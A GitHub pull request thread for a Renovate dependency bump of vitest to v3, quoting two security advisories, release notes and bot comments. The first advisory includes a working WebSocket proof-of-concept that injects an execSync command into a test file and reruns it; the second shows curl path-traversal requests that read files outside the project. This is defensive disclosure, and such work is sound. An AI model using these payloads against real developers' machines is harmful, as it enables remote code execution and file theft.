chore(deps): update dependency vitest to v3 [security]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
vitest (source)	^1.6.0 → ^3.0.0

---

Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening

CVE-2025-24964 / GHSA-9crc-q9x8-hgqq

More information

Details

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

1. Open Vitest UI.
2. Access a malicious web site with the script below.
3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.

// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Severity

• CVSS Score: 9.6 / 10 (Critical)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

References

• https://github.com/vitest-dev/vitest/security/advisories/GHSA-9crc-q9x8-hgqq
• https://github.com/vitest-dev/vitest/commit/191ef9e34c867d0efd04f49b3d38193a68e825dc
• https://github.com/vitest-dev/vitest/commit/7ce9fbb4972d45c6fd34c843645ef6f549bbb241
• https://github.com/vitest-dev/vitest/commit/e0fe1d81e2d4bcddb1c6ca3c5c3970d8ba697383
• https://nvd.nist.gov/vuln/detail/CVE-2025-24964
• https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46
• https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76
• https://vitest.dev/config/#api
• https://github.com/advisories/GHSA-9crc-q9x8-hgqq

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

When Vitest UI server is listening, arbitrary file can be read and executed

CVE-2026-47429 / GHSA-5xrq-8626-4rwp

More information

Details

Summary

Arbitrary file can be read on Windows when Vitest UI server is listening, especially when exposed to the network.

Impact

Only users that match either of the following conditions are affected:

• explicitly exposes the Vitest UI server to the network (using --api.host or api.host config option)
• running the Vitest UI or Browser Mode on Windows

Details

The API handler for /__vitest_attachment__ uses the deprecated isFileServingAllowed incorrectly.
https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/ui/node/index.ts#L77
The function expects the passed value to use cleanUrl after the check before file system related operation.
Because of this, it is possible to bypass the check by \\?\\..\\. This is not possible on Linux as Linux errors if a directory named ? does not exist.

A similar problem exists in other places as well.

• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/vitest/src/api/setup.ts#L103-L105
• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/vitest/src/api/setup.ts#L119-L121
• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/commands/fs.ts#L10-L11
• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/plugin.ts#L194-L196
• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/rpc.ts#L115-L121

That said, this isFileServingAllowed check does not actually prevent the API to be abused. Since the API has rerun feature and file write feature, it's possible to run arbitrary script by writing a script as a test file using saveTestFile and running it using rerun. This means exposing the API / Vitest UI is equivalent to giving script execution access.
On the browser mode side, there're readFile / writeFile / saveSnapshotFile. So exposing the browser mode is equivalent to giving file read / write access.

PoC

1. Run Vitest UI
2. Get the API token by curl http://localhost:51204/__vitest__/
3. Run curl "http://localhost:51204/__vitest_attachment__?path=C:\\path\\to\\project\\?\\..\\..\\secret.txt&contentType=text/plain&token=$TOKEN" (TOKEN is the API token)
4. curl shows the content of secret.txt that is outside the project directory

Mitigations

Vitest now ships two configuration flags, allowWrite and allowExec, that gate the privileged operations exploited by this vulnerability. Both are disabled by default whenever the API server is bound to a non-localhost host, ensuring that exposing the server to the network no longer implicitly grants write or execute capabilities to remote clients.

When these flags are disabled, the UI also enters a read-only mode: in-browser code editing and test file execution are turned off, removing the attack surface that allowed remote code execution. Many Browser Mode features are also disabled, like attachments, artifacts or snapshots. See browser.api.

Users who require the full interactive UI on a networked host must explicitly opt in by setting allowWrite and/or allowExec to true.

Severity

• CVSS Score: 9.8 / 10 (Critical)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

• https://github.com/vitest-dev/vitest/security/advisories/GHSA-5xrq-8626-4rwp
• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/commands/fs.ts#L10-L11
• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/plugin.ts#L194-L196
• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/rpc.ts#L115-L121
• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/ui/node/index.ts#L77
• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/vitest/src/api/setup.ts#L103-L105
• https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/vitest/src/api/setup.ts#L119-L121
• https://github.com/advisories/GHSA-5xrq-8626-4rwp

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

vitest-dev/vitest (vitest)

v3.2.6

Compare Source

v3.2.5

Compare Source

v3.2.4

Compare Source

   🐞 Bug Fixes

• Use correct path for optimisation of strip-literal  -  by @​mrginglymus in #​8139 (44940)
• Print uint and buffer as a simple string  -  by @​sheremet-va in #​8141 (b86bf)
• browser:
  • Show a helpful error when spying on an export  -  by @​sheremet-va in #​8178 (56007)
• cli:
  • vitest run --watch should be watch-mode  -  by @​AriPerkkio in #​8128 (657e8)
  • Use absolute path environment on Windows  -  by @​colinaaa in #​8105 (85dc0)
  • Throw error when --shard x/<count> exceeds count of test files  -  by @​AriPerkkio in #​8112 (8a18c)
• coverage:
  • Ignore SCSS in browser mode  -  by @​sheremet-va in #​8161 (0c3be)
• deps:
  • Update all non-major dependencies  -  in #​8123 (93f32)
• expect:
  • Handle async errors in expect.soft  -  by @​lzl0304 in #​8145 (68699)
• pool:
  • Auto-adjust minWorkers when only maxWorkers specified  -  by @​AriPerkkio in #​8110 (14dc0)
• reporter:
  • task.meta should be available in custom reporter's errors  -  by @​AriPerkkio in #​8115 (27df6)
• runner:
  • Preserve handler wrapping on extend  -  by @​pengooseDev in #​8153 (a9281)
• ui:
  • Ensure ui config option works correctly  -  by @​lzl0304 in #​8147 (42eeb)

    View changes on GitHub

v3.2.3

Compare Source

   🚀 Features

• browser: Use base url instead of vitest  -  by @​sheremet-va in #​8126 (1d8eb)
• ui: Show test annotations and metadata in the test report tab  -  by @​sheremet-va in #​8093 (c69be)

   🐞 Bug Fixes

• Rerun tests when project's setup file is changed  -  by @​sheremet-va in #​8097 (0f335)
• Revert expect.any return type  -  by @​sheremet-va in #​8129 (47514)
• Run only the name plugin last, not all config plugins  -  by @​sheremet-va in #​8130 (83862)
• pool:
  • Throw if user's tests use process.send()  -  by @​AriPerkkio in #​8125 (dfe81)
• runner:
  • Fast sequential task updates missing  -  by @​AriPerkkio in #​8121 (7bd11)
  • Comments between fixture destructures  -  by @​AriPerkkio in #​8127 (dc469)
• vite-node:
  • Unable to handle errors where sourcemap mapping empty  -  by @​blake-newman and @​hi-ogawa in #​8071 (8aa25)

    View changes on GitHub

v3.2.2

Compare Source

   🚀 Features

• Support rolldown-vite  -  by @​sheremet-va and @​hi-ogawa in #​7509 (c8d62)

   🐞 Bug Fixes

• browser:
  • Calculate prepare time from createTesters call on the main thread  -  by @​sheremet-va in #​8101 (142c7)
  • Optimize build output and always prebundle vitest  -  by @​sheremet-va (00a39)
  • Make custom locators available in vitest-browser-* packages  -  by @​sheremet-va in #​8103 (247ef)
• expect:
  • Ensure we can always self toEqual  -  by @​dubzzz in #​8094 (02ec8)
• reporter:
  • Allow dot reporter to work in non interactive terminals  -  by @​bstephen1 and @​AriPerkkio in #​7994 (6db9f)

    View changes on GitHub

v3.2.1

Compare Source

   🐞 Bug Fixes

• Use sha1 instead of md5 for hashing  -  by @​sheremet-va (e4c73)
• expect:
  • Fix chai import in dts  -  by @​hi-ogawa in #​8077 (a7593)
  • Export DeeplyAllowMatchers  -  by @​sheremet-va in #​8078 (30ab4)

    View changes on GitHub

v3.2.0

Compare Source

   🚀 Features

• Provide ctx.signal  -  by @​sheremet-va in #​7878 (e761f)
• Support custom colors for test.name  -  by @​AriPerkkio in #​7809 (4af5d)
• Add vi.mockObject to automock any object  -  by @​hi-ogawa and @​sheremet-va in #​7761 (465bd)
• Introduce watchTriggerPatterns option  -  by @​sheremet-va in #​7778 (a0675)
• Deprecate workspace in favor of projects  -  by @​sheremet-va and @​AriPerkkio in #​7923 (41beb)
• Explicit Resource Management support in mocked functions  -  by @​EskiMojo14 in #​7927 (b67d3)
• Add sequence.groupOrder option  -  by @​sheremet-va in #​7852 (d1a1d)
• Initial support for Temporal equality  -  by @​dirkluijk in #​8007 (52bd7)
• Support Vite 7  -  by @​sheremet-va in #​8003 (1716b)
• Track module execution totalTime and selfTime  -  by @​abrenneke in #​8027 (95961)
• Annotation API  -  by @​sheremet-va in #​7953 (b03f2)
• browser:
  • Implement connect option for playwright browser provider  -  by @​egfx-notifications and @​sheremet-va in #​7915 (029c0)
  • Add screenshot.save option  -  by @​sheremet-va in #​7777 (d9f51)
  • Custom locators API  -  by @​sheremet-va in #​7993 (e6fbd)
• coverage:
  • V8 experimental AST-aware remapping  -  by @​AriPerkkio in #​7736 (78a3d)
• reporter:
  • Add onWritePath option to github-actions  -  by @​nwalters512 and @​AriPerkkio in #​8015 (abd3b)
• vitest:
  • Allow per-file and per-worker fixtures  -  by @​sheremet-va and @​AriPerkkio in #​7704 (9cbfc)

   🐞 Bug Fixes

• Replace micromatch with picomatch  -  by @​sapphi-red in #​7951 (df076)
• Try to catch unhandled error outside of a test  -  by @​sheremet-va in #​7968 (46421)
• Generate a separate config for "vitest init browser" instead of a workspace file  -  by @​sheremet-va in #​7934 (e84e2)
• Switch ExpectStatic any types to AsymmetricMatcher<unknown>, with DeeplyAllowMatchers<T>  -  by @​JoshuaKGoldberg in #​7016 (8ec44)
• Remove unused exports  -  by @​sheremet-va in #​7618 (33d05)
• Throw an error if typechecker failed to spawn  -  by @​sheremet-va in #​7990 (0e960)
• Ignore non-string stack properties  -  by @​sheremet-va in #​7995 (330f9)
• Apply browser CLI options only if the project has the browser set in the config already  -  by @​sheremet-va in #​7984 (70358)
• Ensure errors keep their message and stack after toJSON serialisation  -  by @​sheremet-va in #​8053 (3bdf0)
• browser:
  • Resolve FS commands relative to the project root  -  by @​sheremet-va in #​7896 (69ac9)
  • Run tests serially if provider doesn't provide a mocker  -  by @​sheremet-va in #​8032 (227a9)
  • Resolve upload files relative to the project root  -  by @​sheremet-va in #​8042 (b9a31)
  • Await mocker invalidation to avoid race condition with "mock wasn't registered"  -  by @​sheremet-va in #​8021 (b34ff)
  • Share vite cache with the project cache  -  by @​sheremet-va in #​8049 (0cbad)
  • Add this type to locators.extend  -  by @​sheremet-va in #​8069 (70fb0)
• cache:
  • Preserve test results from previous runs  -  by @​macko911 in #​8043 (d6ef0)
• cli:
  • Add built-in reporters list to --help output  -  by @​pengooseDev in #​7955 (ef6ef)
  • Parse --silent values properly  -  by @​AriPerkkio in #​8055 (8fad7)
• coverage:
  • Istanbul provider to not use Vite preserved query params  -  by @​AriPerkkio in #​7939 (a05d4)
  • Browser + v8 in source tests missing  -  by @​AriPerkkio in #​7946 (51cd8)
  • In-source test cases excluded  -  by @​AriPerkkio in #​7985 (407c0)
• dev:
  • Fix relay of custom equality testers  -  by @​StefanLiebscher in #​6140 (6dc1d)
• expect:
  • Unbundle @types/chai  -  by @​hi-ogawa in #​7937 (525f5)
  • Support type-safe declaration of custom matchers  -  by @​kettanaito and @​sheremet-va in #​7656 (e996b)
• reporters:
  • Check the test result again when tests are rerunning  -  by @​sheremet-va in #​8063 (35e31)
• spy:
  • Copy over static properties from the function  -  by @​sheremet-va in #​7780 (9b9f0)
• typecheck:
  • Don't panic during vitest list command  -  by @​sheremet-va in #​7933 (ba6da)
  • Avoid creating a temporary tsconfig file when typechecking  -  by @​sheremet-va in #​7967 (34f43)
• vite-node:
  • Add __vite_ssr_exportName__  -  by @​hi-ogawa in #​7925 (76091)
• vitest:
  • Adjust getWorkerMemoryLimit priority for vmForks  -  by @​pengooseDev in #​7960 (5a91e)
• wdio:
  • Don't scale browser in headless mode  -  by @​sheremet-va in #​8033 (c23b0)

    View changes on GitHub

v3.1.4

Compare Source

   🐞 Bug Fixes

• Apply browser CLI options only if the project has the browser set in the config already  -  by @​sheremet-va in #​8002 (64f2b)

    View changes on GitHub

v3.1.3

Compare Source

   🐞 Bug Fixes

• Correctly resolve vitest import if inline: true is set  -  by @​sheremet-va in #​7856 (a83f3)
• Fix fixture parsing with lowered async with esbuild 0.25.3  -  by @​hi-ogawa in #​7921 (c5c85)
• Remove event-catcher code  -  by @​sheremet-va in #​7898 (deb1b)
• Reset mocks on test retry/repeat  -  by @​sheremet-va in #​7897 (2fa76)
• Ignore failures on writeToCache  -  by @​orgads in #​7893 (8c7f7)
• browser: Correctly inherit CLI options  -  by @​sheremet-va in #​7858 (03660)
• deps: Update all non-major dependencies  -  in #​7867 (67ef7)
• reporters: --merge-reports to show each total run times  -  by @​AriPerkkio in #​7877 (d613b)

    View changes on GitHub

v3.1.2

Compare Source

   🐞 Bug Fixes

• Add global chai variable in vitest/globals (fix: #​7474)  -  by @​Jay-Karia in #​7771 and #​7474 (d9297)
• Prevent modifying test.exclude when same object passed in coverage.exclude  -  by @​AriPerkkio in #​7774 (c3751)
• Fix already hoisted mock  -  by @​hi-ogawa in #​7815 (773b1)
• Fix test.scoped inheritance  -  by @​hi-ogawa in #​7814 (db6c3)
• Remove pointer-events-none after resizing the left panel  -  by @​alexprudhomme in #​7811 (a7e77)
• Default to run mode when stdin is not a TTY  -  by @​kentonv, @​hi-ogawa and @​sheremet-va in #​7673 (6358f)
• Use happy-dom/jsdom types for envionmentOptions  -  by @​hi-ogawa in #​7795 (67430)
• browser:
  • Fix transform error before browser server initialization  -  by @​hi-ogawa in #​7783 (5f762)
  • Fix mocking from outside of root  -  by @​hi-ogawa in #​7789 (03f55)
  • Scale iframe for non ui case  -  by @​hi-ogawa in #​6512 (c3374)
• coverage:
  • await profiler calls  -  by @​AriPerkkio in #​7763 (795a6)
  • Expose profiling timers  -  by @​AriPerkkio in #​7820 (5652b)
• deps:
  • Update all non-major dependencies  -  in #​7765 (7c3df)
  • Update all non-major dependencies  -  in #​7831 (15701)
• runner:
  • Correctly call test hooks and teardown functions  -  by @​sheremet-va in #​7775 (3c00c)
  • Show stacktrace on test timeout error  -  by @​hi-ogawa in #​7799 (df33b)
• ui:
  • Load panel sizes from storage on initial load  -  by @​userquin in #​7265 (6555d)
• vite-node:
  • Named export should overwrite export all  -  by @​hi-ogawa in #​7846 (5ba0d)
  • Add ERR_MODULE_NOT_FOUND code error if module cannot be loaded  -  by @​sheremet-va in #​7776 (f9eac)

   🏎 Performance

• browser: Improve browser parallelisation  -  by @​sheremet-va in #​7665 (816a5)

    View changes on GitHub

v3.1.1

Compare Source

   🐞 Bug Fixes

• reporter:
  • Report tests in correct order  -  by @​sheremet-va in #​7752 (b166e)
  • Print test only once in the verbose mode  -  by @​sheremet-va in #​7738 (69ca4)

    View changes on GitHub

v3.1.0

Compare Source

🚀 Features

• Introduce %$ option to add number of the test to its title - by @​kemuridama in #​7412 (df347)
• Add diff.maxDepth option and set non-Infinity value as a default to reduce crash - by @​hi-ogawa in #​7481 (eacab)
• Allow array element for test.each/for title formatting - by @​hi-ogawa in #​7522 (ea3d6)
• Add "configureVitest" plugin hook - by @​sheremet-va and @​AriPerkkio in #​7349 (20a5d)
• Support --configLoader CLI option - by @​Carnageous and @​hi-ogawa in #​7574 (2a852)
• Added vitest-browser-lit to vitest init browser and docs - by @​EskiMojo14 and @​hi-ogawa in #​7705 (5659a)
• Use providers request interception for module mocking - by @​sheremet-va in #​7576 (7883a)
• browser:
  • Introduce and, or and filter locators - by @​sheremet-va and @​AriPerkkio in #​7463 (63949)
• reporter:
  • Always render test time - by @​AriPerkkio and @​spamshaker in #​7529 (5eba6)
  • --silent=passed-only to log failed tasks only - by @​AriPerkkio in #​7530 (f9e1c)
• runner:
  • Add test.scoped to override test.extend fixtures per-suite - by @​sheremet-va in #​7233 (e5851)
• vitest:
  • Allow conditional context.skip(boolean) - by @​sheremet-va and @​AriPerkkio in #​7659 (6adec)
  • Support rolldown-vite in NormalizeUrlPlugin - by @​sapphi-red and @​sheremet-va in #​7739 (1ef31)

🐞 Bug Fixes

• Update test stats regularly - by @​hi-ogawa in #​7700 (b7953)
• Fix vm tests flakiness - by @​sheremet-va in #​7741 (2702c)
• Set diff.expand: false as default - by @​hi-ogawa in #​7697 (f3420)
• browser:
  • Correctly calculate timeout in hooks when actions are performed - by @​sheremet-va in #​7747 (a5505)
• deps:
  • Update all non-major dependencies - by @​hi-ogawa in #​7600 (7fc5a)
• reporter:
  • --hideSkippedTests should hide suites too - by @​AriPerkkio in #​7695 (ba9b5)
  • Report tests in correct order - by @​sheremet-va in #​7752 (b166e)
  • Print test only once in the verbose mode - by @​sheremet-va in #​7738 (69ca4)
• snapshot:
  • Fix indent normalization - by @​hi-ogawa in #​7400 (82997)
  • This change can cause small amount of very old snapshots to be updated, but there will be no functional change to how they work.

🏎 Performance

• browser: Fork jest-dom instead of bundling it - by @​sheremet-va in #​7605 (12762)

View changes on GitHub

v3.0.9

Compare Source

   🐞 Bug Fixes

• Typings of ctx.skip() as never  -  by @​sirlancelot in #​7608 (09f35)
• Cleanup vitest in public resolveConfig API  -  by @​hi-ogawa in #​7623 (db14a)
• Fix toHaveBeenCalledWith(asymmetricMatcher) with undefined arguments  -  by @​hi-ogawa in #​7624 (0fb21)
• Race condition in RPC filesystem cache.  -  by @​dts in #​7531 (b7f55)
• Fix getState().testPath during collection with no isolation  -  by @​hi-ogawa in #​7640 (3fb3f)
• Support custom toString method in %s format  -  by @​pengooseDev in #​7637 (46d93)
• browser:
  • Fail playwright timeouts earlier than a test timeout  -  by @​sheremet-va and @​hi-ogawa in #​7565 [(5eb4c)](https://redirect.github.com/

✂ Note

PR body was truncated to here.

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • At any time (no schedule defined)
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[changeset-bot]

⚠️ No Changeset found

Latest commit: e9ebbb3

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

[sourcery-ai]

Reviewer's Guide by Sourcery

This PR updates the vitest dependency from version 1.6.0 to 1.6.1 to address a security vulnerability (CVE-2025-24964) that allows for arbitrary remote code execution. The vulnerability stems from a cross-site WebSocket hijacking (CSWSH) attack when the api option is enabled.

Sequence diagram showing the security vulnerability in Vitest API server

sequenceDiagram
    actor Attacker
    participant MW as Malicious Website
    participant VS as Vitest API Server
    participant FS as File System

    Note over VS: API option enabled
    Note over VS: No Origin header check
    Note over VS: No authorization

    Attacker->>MW: Visits malicious website
    MW->>VS: WebSocket connection (ws://localhost:51204/__vitest_api__)
    VS-->>MW: Connection accepted (vulnerable)
    MW->>VS: getFiles request
    VS-->>MW: Test file paths
    MW->>VS: saveTestFile (inject malicious code)
    VS->>FS: Write malicious code to test file
    MW->>VS: rerun command
    VS->>FS: Execute modified test file
    Note over FS: Arbitrary code execution

Loading

File-Level Changes

Change	Details	Files
Updated vitest dependency to address CVE-2025-24964.	Updated vitest version from 1.6.0 to 1.6.1. Updated @vitest/coverage-v8 version from 1.6.0 to 1.6.0(vitest@1.6.1). Updated picocolors version from 1.0.0 to 1.1.1. Updated @esbuild/aix-ppc64 version from 0.20.2 to 0.21.5. Updated @esbuild/android-arm64 version from 0.20.2 to 0.21.5. Updated @esbuild/android-arm version from 0.20.2 to 0.21.5. Updated @esbuild/android-x64 version from 0.20.2 to 0.21.5. Updated @esbuild/darwin-arm64 version from 0.20.2 to 0.21.5. Updated @esbuild/darwin-x64 version from 0.20.2 to 0.21.5. Updated @esbuild/freebsd-arm64 version from 0.20.2 to 0.21.5. Updated @esbuild/freebsd-x64 version from 0.20.2 to 0.21.5. Updated @esbuild/linux-arm64 version from 0.20.2 to 0.21.5. Updated @esbuild/linux-arm version from 0.20.2 to 0.21.5. Updated @esbuild/linux-ia32 version from 0.20.2 to 0.21.5. Updated @esbuild/linux-loong64 version from 0.20.2 to 0.21.5. Updated @esbuild/linux-mips64el version from 0.20.2 to 0.21.5. Updated @esbuild/linux-ppc64 version from 0.20.2 to 0.21.5. Updated @esbuild/linux-riscv64 version from 0.20.2 to 0.21.5. Updated @esbuild/linux-s390x version from 0.20.2 to 0.21.5. Updated @esbuild/linux-x64 version from 0.20.2 to 0.21.5. Updated @esbuild/netbsd-x64 version from 0.20.2 to 0.21.5. Updated @esbuild/openbsd-x64 version from 0.20.2 to 0.21.5. Updated @esbuild/sunos-x64 version from 0.20.2 to 0.21.5. Updated @esbuild/win32-arm64 version from 0.20.2 to 0.21.5. Updated @esbuild/win32-ia32 version from 0.20.2 to 0.21.5. Updated @esbuild/win32-x64 version from 0.20.2 to 0.21.5. Updated @jridgewell/sourcemap-codec version from 1.4.15 to 1.5.0. Added @rollup/rollup-android-arm-eabi version 4.34.2. Updated @rollup/rollup-android-arm64 version from 4.17.2 to 4.34.2. Updated @rollup/rollup-darwin-arm64 version from 4.17.2 to 4.34.2. Updated @rollup/rollup-darwin-x64 version from 4.17.2 to 4.34.2. Added @rollup/rollup-freebsd-arm64 version 4.34.2. Added @rollup/rollup-freebsd-x64 version 4.34.2. Updated @rollup/rollup-linux-arm-gnueabihf version from 4.17.2 to 4.34.2. Updated @rollup/rollup-linux-arm-musleabihf version from 4.17.2 to 4.34.2. Updated @rollup/rollup-linux-arm64-gnu version from 4.17.2 to 4.34.2. Updated @rollup/rollup-linux-arm64-musl version from 4.17.2 to 4.34.2. Added @rollup/rollup-linux-loongarch64-gnu version 4.34.2. Updated @rollup/rollup-linux-powerpc64le-gnu version from 4.17.2 to 4.34.2. Updated @rollup/rollup-linux-riscv64-gnu version from 4.17.2 to 4.34.2. Updated @rollup/rollup-linux-s390x-gnu version from 4.17.2 to 4.34.2. Updated @rollup/rollup-linux-x64-gnu version from 4.17.2 to 4.34.2. Updated @rollup/rollup-linux-x64-musl version from 4.17.2 to 4.34.2. Updated @rollup/rollup-win32-arm64-msvc version from 4.17.2 to 4.34.2. Updated @rollup/rollup-win32-ia32-msvc version from 4.17.2 to 4.34.2. Updated @rollup/rollup-win32-x64-msvc version from 4.17.2 to 4.34.2. Updated acorn-walk version from 8.3.2 to 8.3.4. Updated acorn version from 8.11.3 to 8.14.0. Updated chai version from 4.4.1 to 4.5.0. Updated deep-eql version from 4.1.3 to 4.1.4. Updated type-detect version from 4.0.8 to 4.1.0. Updated cross-spawn version from 7.0.3 to 7.0.6. Updated debug version from 4.3.4 to 4.4.0. Updated ms version from 2.1.2 to 2.1.3. Updated esbuild version from 0.20.2 to 0.21.5. Updated magic-string version from 0.30.10 to 0.30.17. Updated mlly version from 1.7.0 to 1.7.4. Updated pkg-types version from 1.1.0 to 1.3.1. Updated ufo version from 1.5.3 to 1.5.4. Updated postcss version from 8.4.38 to 8.5.1. Updated rollup version from 4.17.2 to 4.34.2. Updated std-env version from 3.7.0 to 3.8.0. Updated strip-literal version from 2.1.0 to 2.1.1. Updated vite version from 5.2.11 to 5.4.14. Updated vite-node version from 1.6.0 to 1.6.1. Updated vitest version from 1.6.0 to 1.6.1. Updated why-is-node-running version from 2.2.2 to 2.3.0. Updated yocto-queue version from 1.0.0 to 1.1.1.	pnpm-lock.yaml

---

Tips and commands

Interacting with Sourcery

• Trigger a new review: Comment @sourcery-ai review on the pull request.
• Continue discussions: Reply directly to Sourcery's review comments.
• Generate a GitHub issue from a review comment: Ask Sourcery to create an
  issue from a review comment by replying to it. You can also reply to a
  review comment with @sourcery-ai issue to create an issue from it.
• Generate a pull request title: Write @sourcery-ai anywhere in the pull
  request title to generate a title at any time. You can also comment
  @sourcery-ai title on the pull request to (re-)generate the title at any time.
• Generate a pull request summary: Write @sourcery-ai summary anywhere in
  the pull request body to generate a PR summary at any time exactly where you
  want it. You can also comment @sourcery-ai summary on the pull request to
  (re-)generate the summary at any time.
• Generate reviewer's guide: Comment @sourcery-ai guide on the pull
  request to (re-)generate the reviewer's guide at any time.
• Resolve all Sourcery comments: Comment @sourcery-ai resolve on the
  pull request to resolve all Sourcery comments. Useful if you've already
  addressed all the comments and don't want to see them anymore.
• Dismiss all Sourcery reviews: Comment @sourcery-ai dismiss on the pull
  request to dismiss all existing Sourcery reviews. Especially useful if you
  want to start fresh with a new review - don't forget to comment
  @sourcery-ai review to trigger a new review!
• Generate a plan of action for an issue: Comment @sourcery-ai plan on
  an issue to generate a plan of action for it.

Customizing Your Experience

Access your dashboard to:

• Enable or disable review features such as the Sourcery-generated pull request
  summary, the reviewer's guide, and others.
• Change the review language.
• Add, remove or edit custom review instructions.
• Adjust other review settings.

Getting Help

• Contact our support team for questions or feedback.
• Visit our documentation for detailed guides and information.
• Keep in touch with the Sourcery team by following us on X/Twitter, LinkedIn or GitHub.

[sourcery-ai]

We have skipped reviewing this pull request. It seems to have been created by a bot (hey, renovate[bot]!). We assume it knows what it's doing!